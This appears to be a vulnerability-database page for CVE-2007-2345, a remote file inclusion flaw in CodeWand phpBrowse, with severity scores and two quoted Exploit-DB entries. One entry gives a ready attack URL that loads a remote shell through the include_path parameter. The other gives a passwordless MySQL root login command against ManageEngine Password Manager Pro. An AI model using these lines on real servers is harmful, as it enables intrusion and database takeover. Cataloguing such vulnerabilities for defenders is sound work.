CVE-2007-2345
published 2007-04-27CVE-2007-2345: PHP remote file inclusion vulnerability in include/include_stream.inc.php in CodeWand phpBrowse allows remote attackers to execute arbitrary PHP code via a URL…
PriorityP347high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
6.08%
92.5th percentile
PHP remote file inclusion vulnerability in include/include_stream.inc.php in CodeWand phpBrowse allows remote attackers to execute arbitrary PHP code via a URL in the include_path parameter.
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
ManageEngine Password Manager Pro Build 5401 - Database Remote Unauthorized Access
exploitdb·2007-04-27
CVE-2007-2429 ManageEngine Password Manager Pro Build 5401 - Database Remote Unauthorized Access
ManageEngine Password Manager Pro Build 5401 - Database Remote Unauthorized Access
---
source: https://www.securityfocus.com/bid/23693/info
ManageEngine Password Manager Pro is prone to a remote unauthorized-access vulnerability due to a design error.
An attacker may leverage this issue to gain unauthorized access to the application's database with administrative privileges. Successful exploits will result in a complete compromise of vulnerable applications and may aid in further attacks.
ManageEngine Password Manager Pro Free edition is vulnerable; other versions may also be affected.
$mysql -h example.com --port 2345 -u root
Exploit-DB
CodeWand phpBrowse - 'site_path' Remote File Inclusion
exploitdb·2007-04-05
CVE-2007-2345 CodeWand phpBrowse - 'site_path' Remote File Inclusion
CodeWand phpBrowse - 'site_path' Remote File Inclusion
---
PhpBrowse
Found by kezzap66345 *
Script:
http://www.codewand.org/download/phpBrowse.tar.gz
ERROR:
/include/include_stream.inc.php
include($include_path . "style.inc.php"); <<< rfi coded
RFI:
http://SITE.com/path/include/include_stream.inc.php?include_path=[SHELL]
kezzap66345[at]hotmail[dot]com
******thanx=x0r0n*str0ke*shika***Siircicocuk*******************************************
# milw0rm.com [2007-04-05]
No writeups or analysis indexed.
2007-04-27
Published